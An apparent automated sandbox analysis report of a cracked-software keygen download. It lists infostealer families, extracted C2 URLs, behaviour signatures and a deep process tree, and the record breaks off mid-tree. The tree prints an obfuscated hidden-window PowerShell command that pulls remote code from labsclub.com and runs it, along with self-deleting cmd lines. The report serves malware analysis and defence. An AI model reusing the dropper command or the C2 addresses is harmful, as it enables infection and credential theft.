Resubmissions

06-10-2022 21:06

221006-zxrwaaaga6 10

13-04-2021 12:47

210413-myxlaxh4ta 10

12-04-2021 13:54

210412-6sz4v79f2x 10

Analysis

  • max time kernel
    183s
  • max time network
    381s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    12-04-2021 13:54

Errors

Reason
Machine shutdown

General

  • Target

    https://keygenit.com/d/3e16ccf432109nspn247.html

  • Sample

    210412-6sz4v79f2x

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

raccoon

Botnet

a6bfe7e504db71e25642b830fd9b2c4366cf882a

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Blocklisted process makes network request 7 IoCs
  • Drops file in Drivers directory 5 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks for any installed AV software in registry 1 TTPs 64 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 9 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 21 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 33 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 11 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 5 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 13 IoCs
  • NTFS ADS 1 IoCs
  • Runs ping.exe 1 TTPs 6 IoCs
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2724
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2712
    • C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" https://keygenit.com/d/3e16ccf432109nspn247.html
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:2208
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://keygenit.com/d/3e16ccf432109nspn247.html
        2⤵
        • Checks processor information in registry
        • NTFS ADS
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2844
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2844.0.809265375\1902709912" -parentBuildID 20200403170909 -prefsHandle 1532 -prefMapHandle 1524 -prefsLen 1 -prefMapSize 219680 -appdir "C:\Program Files\Mozilla Firefox\browser" - 2844 "\\.\pipe\gecko-crash-server-pipe.2844" 1632 gpu
          3⤵
            PID:2392
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2844.3.383706935\1236236171" -childID 1 -isForBrowser -prefsHandle 2212 -prefMapHandle 2232 -prefsLen 122 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 2844 "\\.\pipe\gecko-crash-server-pipe.2844" 2328 tab
            3⤵
              PID:3672
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2844.13.869173762\1267796735" -childID 2 -isForBrowser -prefsHandle 3316 -prefMapHandle 3312 -prefsLen 6979 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 2844 "\\.\pipe\gecko-crash-server-pipe.2844" 3328 tab
              3⤵
                PID:4084
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2844.20.182850510\650900114" -childID 3 -isForBrowser -prefsHandle 4144 -prefMapHandle 4368 -prefsLen 7750 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 2844 "\\.\pipe\gecko-crash-server-pipe.2844" 4324 tab
                3⤵
                  PID:4576
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Browser
              1⤵
                PID:2604
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2380
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                1⤵
                  PID:2368
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                  1⤵
                    PID:1924
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s SENS
                    1⤵
                      PID:1380
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                      1⤵
                        PID:1368
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Themes
                        1⤵
                          PID:1164
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                          1⤵
                            PID:1112
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                            1⤵
                            • Drops file in System32 directory
                            • Drops file in Windows directory
                            PID:344
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                            1⤵
                              PID:996
                            • \??\c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                              1⤵
                              • Suspicious use of SetThreadContext
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:648
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                2⤵
                                • Drops file in System32 directory
                                • Checks processor information in registry
                                • Modifies data under HKEY_USERS
                                PID:4512
                            • C:\Windows\System32\rundll32.exe
                              C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                              1⤵
                                PID:5080
                              • C:\Users\Admin\AppData\Local\Temp\Temp2_R_wipe_clean_11_crack.zip\R_wipe_clean_11_crack.exe
                                "C:\Users\Admin\AppData\Local\Temp\Temp2_R_wipe_clean_11_crack.zip\R_wipe_clean_11_crack.exe"
                                1⤵
                                  PID:2736
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                    2⤵
                                      PID:4300
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                        keygen-pr.exe -p83fsase3Ge
                                        3⤵
                                        • Executes dropped EXE
                                        PID:4392
                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:4920
                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                            C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                            5⤵
                                            • Executes dropped EXE
                                            PID:1268
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                        keygen-step-1.exe
                                        3⤵
                                        • Executes dropped EXE
                                        PID:2780
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                        keygen-step-2.exe
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        • Modifies system certificate store
                                        PID:568
                                        • C:\Users\Admin\AppData\Roaming\EE2E.tmp.exe
                                          "C:\Users\Admin\AppData\Roaming\EE2E.tmp.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:1136
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\EE2E.tmp.exe"
                                            5⤵
                                              PID:5380
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /T 10 /NOBREAK
                                                6⤵
                                                • Delays execution with timeout.exe
                                                PID:5432
                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:4620
                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe"
                                              5⤵
                                              • Executes dropped EXE
                                              • Checks processor information in registry
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:4804
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 276
                                              5⤵
                                              • Program crash
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:928
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                            4⤵
                                              PID:2480
                                              • C:\Windows\SysWOW64\PING.EXE
                                                ping 127.0.0.1
                                                5⤵
                                                • Runs ping.exe
                                                PID:3872
                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                            keygen-step-3.exe
                                            3⤵
                                            • Executes dropped EXE
                                            PID:4944
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                              4⤵
                                                PID:1016
                                                • C:\Windows\SysWOW64\PING.EXE
                                                  ping 1.1.1.1 -n 1 -w 3000
                                                  5⤵
                                                  • Runs ping.exe
                                                  PID:4812
                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                              keygen-step-4.exe
                                              3⤵
                                              • Executes dropped EXE
                                              • Checks computer location settings
                                              PID:4868
                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4276
                                                • C:\Users\Admin\AppData\Local\Temp\S86VTYSA2C\multitimer.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\S86VTYSA2C\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                                                  5⤵
                                                    PID:4116
                                                    • C:\Users\Admin\AppData\Local\Temp\S86VTYSA2C\multitimer.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\S86VTYSA2C\multitimer.exe" 1 3.1618235739.6074515b9ef83 101
                                                      6⤵
                                                        PID:6064
                                                        • C:\Users\Admin\AppData\Local\Temp\S86VTYSA2C\multitimer.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\S86VTYSA2C\multitimer.exe" 2 3.1618235739.6074515b9ef83
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Checks for any installed AV software in registry
                                                          PID:5496
                                                          • C:\Users\Admin\AppData\Local\Temp\gg0lh4zksz2\1j0lavppg2e.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\gg0lh4zksz2\1j0lavppg2e.exe" /VERYSILENT
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:4792
                                                            • C:\Users\Admin\AppData\Local\Temp\is-C7QG8.tmp\1j0lavppg2e.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-C7QG8.tmp\1j0lavppg2e.tmp" /SL5="$70256,140785,56832,C:\Users\Admin\AppData\Local\Temp\gg0lh4zksz2\1j0lavppg2e.exe" /VERYSILENT
                                                              9⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Drops file in Program Files directory
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:5884
                                                              • C:\Users\Admin\AppData\Local\Temp\is-MJJAT.tmp\apipostback.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\is-MJJAT.tmp\apipostback.exe" adan adan
                                                                10⤵
                                                                • Executes dropped EXE
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:3084
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\FyZOyNBvN.dll"
                                                                  11⤵
                                                                    PID:6820
                                                                    • C:\Windows\SysWOW64\regsvr32.exe
                                                                      regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\FyZOyNBvN.dll"
                                                                      12⤵
                                                                      • Loads dropped DLL
                                                                      PID:5552
                                                                      • C:\Windows\system32\regsvr32.exe
                                                                        /s "C:\Users\Admin\AppData\Local\Temp\FyZOyNBvN.dll"
                                                                        13⤵
                                                                        • Loads dropped DLL
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:6316
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\FyZOyNBvN.dllbddzsWtLb.dll"
                                                                    11⤵
                                                                      PID:7816
                                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                                        regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\FyZOyNBvN.dllbddzsWtLb.dll"
                                                                        12⤵
                                                                          PID:5440
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                        11⤵
                                                                          PID:5260
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                            12⤵
                                                                            • Blocklisted process makes network request
                                                                            PID:5500
                                                                  • C:\Users\Admin\AppData\Local\Temp\mu3mq5yqv2l\Setup3310.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\mu3mq5yqv2l\Setup3310.exe" /Verysilent /subid=577
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    PID:4352
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-DDO0M.tmp\Setup3310.tmp
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-DDO0M.tmp\Setup3310.tmp" /SL5="$20432,138429,56832,C:\Users\Admin\AppData\Local\Temp\mu3mq5yqv2l\Setup3310.exe" /Verysilent /subid=577
                                                                      9⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      PID:4960
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-5VKMS.tmp\Setup.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-5VKMS.tmp\Setup.exe" /Verysilent
                                                                        10⤵
                                                                        • Executes dropped EXE
                                                                        • Drops file in Program Files directory
                                                                        PID:6680
                                                                        • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe
                                                                          "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe"
                                                                          11⤵
                                                                          • Executes dropped EXE
                                                                          • Adds Run key to start application
                                                                          PID:7052
                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            12⤵
                                                                            • Executes dropped EXE
                                                                            • Drops file in Program Files directory
                                                                            PID:7136
                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            12⤵
                                                                            • Executes dropped EXE
                                                                            PID:5072
                                                                        • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe
                                                                          "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"
                                                                          11⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Checks processor information in registry
                                                                          PID:7084
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
                                                                            12⤵
                                                                              PID:4668
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /im RunWW.exe /f
                                                                                13⤵
                                                                                • Kills process with taskkill
                                                                                PID:6732
                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                timeout /t 6
                                                                                13⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:6568
                                                                          • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe
                                                                            "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe"
                                                                            11⤵
                                                                            • Executes dropped EXE
                                                                            • Checks whether UAC is enabled
                                                                            • Drops file in Program Files directory
                                                                            PID:7112
                                                                          • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe
                                                                            "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe"
                                                                            11⤵
                                                                              PID:7136
                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
                                                                                12⤵
                                                                                  PID:4892
                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                                                    13⤵
                                                                                      PID:7200
                                                                                • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe
                                                                                  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe"
                                                                                  11⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:504
                                                                                  • C:\Users\Admin\AppData\Local\Temp\INC6P1DNRU\multitimer.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\INC6P1DNRU\multitimer.exe" 0 306065bb10421b26.04333812 0 103
                                                                                    12⤵
                                                                                    • Executes dropped EXE
                                                                                    • Drops file in Windows directory
                                                                                    PID:7876
                                                                                    • C:\Users\Admin\AppData\Local\Temp\INC6P1DNRU\multitimer.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\INC6P1DNRU\multitimer.exe" 1 3.1618235771.6074517bcc1e4 103
                                                                                      13⤵
                                                                                      • Adds Run key to start application
                                                                                      PID:6364
                                                                                      • C:\Users\Admin\AppData\Local\Temp\INC6P1DNRU\multitimer.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\INC6P1DNRU\multitimer.exe" 2 3.1618235771.6074517bcc1e4
                                                                                        14⤵
                                                                                        • Checks for any installed AV software in registry
                                                                                        PID:2072
                                                                                        • C:\Users\Admin\AppData\Local\Temp\gknevi02k4s\Setup3310.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\gknevi02k4s\Setup3310.exe" /Verysilent /subid=577
                                                                                          15⤵
                                                                                            PID:3984
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-DRVFF.tmp\Setup3310.tmp
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-DRVFF.tmp\Setup3310.tmp" /SL5="$502F2,138429,56832,C:\Users\Admin\AppData\Local\Temp\gknevi02k4s\Setup3310.exe" /Verysilent /subid=577
                                                                                              16⤵
                                                                                                PID:5912
                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-8BDE9.tmp\Setup.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-8BDE9.tmp\Setup.exe" /Verysilent
                                                                                                  17⤵
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:4920
                                                                                            • C:\Users\Admin\AppData\Local\Temp\qulm1tp0cnc\app.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\qulm1tp0cnc\app.exe" /8-23
                                                                                              15⤵
                                                                                                PID:680
                                                                                                • C:\Users\Admin\AppData\Local\Temp\qulm1tp0cnc\app.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\qulm1tp0cnc\app.exe" /8-23
                                                                                                  16⤵
                                                                                                    PID:4568
                                                                                                • C:\Users\Admin\AppData\Local\Temp\w4esodp1fg3\vpn.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\w4esodp1fg3\vpn.exe" /silent /subid=482
                                                                                                  15⤵
                                                                                                    PID:5948
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-ADUIO.tmp\vpn.tmp
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-ADUIO.tmp\vpn.tmp" /SL5="$40378,15170975,270336,C:\Users\Admin\AppData\Local\Temp\w4esodp1fg3\vpn.exe" /silent /subid=482
                                                                                                      16⤵
                                                                                                        PID:7620
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\aipkysjheki\setup_10.2_us3.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\aipkysjheki\setup_10.2_us3.exe" /silent
                                                                                                      15⤵
                                                                                                        PID:2680
                                                                                                • C:\Users\Admin\AppData\Local\Temp\75YJ4GVX6V\setups.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\75YJ4GVX6V\setups.exe" ll
                                                                                                  12⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:7948
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-3VD16.tmp\setups.tmp
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-3VD16.tmp\setups.tmp" /SL5="$4043E,726852,244736,C:\Users\Admin\AppData\Local\Temp\75YJ4GVX6V\setups.exe" ll
                                                                                                    13⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks computer location settings
                                                                                                    • Loads dropped DLL
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    PID:8032
                                                                                              • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe
                                                                                                "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
                                                                                                11⤵
                                                                                                  PID:6232
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-FC7IV.tmp\LabPicV3.tmp
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-FC7IV.tmp\LabPicV3.tmp" /SL5="$2058E,136934,53248,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
                                                                                                    12⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    PID:6464
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-G0AJD.tmp\alpATCHInO.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-G0AJD.tmp\alpATCHInO.exe" /S /UID=lab214
                                                                                                      13⤵
                                                                                                      • Drops file in Drivers directory
                                                                                                      • Executes dropped EXE
                                                                                                      • Adds Run key to start application
                                                                                                      PID:7268
                                                                                                      • C:\Program Files\Windows Security\DNWFTNTEHL\prolab.exe
                                                                                                        "C:\Program Files\Windows Security\DNWFTNTEHL\prolab.exe" /VERYSILENT
                                                                                                        14⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4904
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-65NIO.tmp\prolab.tmp
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-65NIO.tmp\prolab.tmp" /SL5="$801D6,575243,216576,C:\Program Files\Windows Security\DNWFTNTEHL\prolab.exe" /VERYSILENT
                                                                                                          15⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Drops file in Program Files directory
                                                                                                          PID:7408
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10-f3cd2-e4f-fb3af-a12c2c0bc3c4b\Sikaereqyfo.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10-f3cd2-e4f-fb3af-a12c2c0bc3c4b\Sikaereqyfo.exe"
                                                                                                        14⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks computer location settings
                                                                                                        • Adds Run key to start application
                                                                                                        PID:7404
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9b-eefef-960-95c9a-72b9625d09a88\Cuqaeshaeqisi.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\9b-eefef-960-95c9a-72b9625d09a88\Cuqaeshaeqisi.exe"
                                                                                                        14⤵
                                                                                                          PID:6240
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xzdot5y1.zpi\gaooo.exe & exit
                                                                                                            15⤵
                                                                                                              PID:2180
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r4i4bn4v.0r2\jgjg_note8876.exe & exit
                                                                                                              15⤵
                                                                                                                PID:5504
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\r4i4bn4v.0r2\jgjg_note8876.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\r4i4bn4v.0r2\jgjg_note8876.exe
                                                                                                                  16⤵
                                                                                                                  • Checks whether UAC is enabled
                                                                                                                  PID:5124
                                                                                                              • C:\Windows\System32\cmd.exe
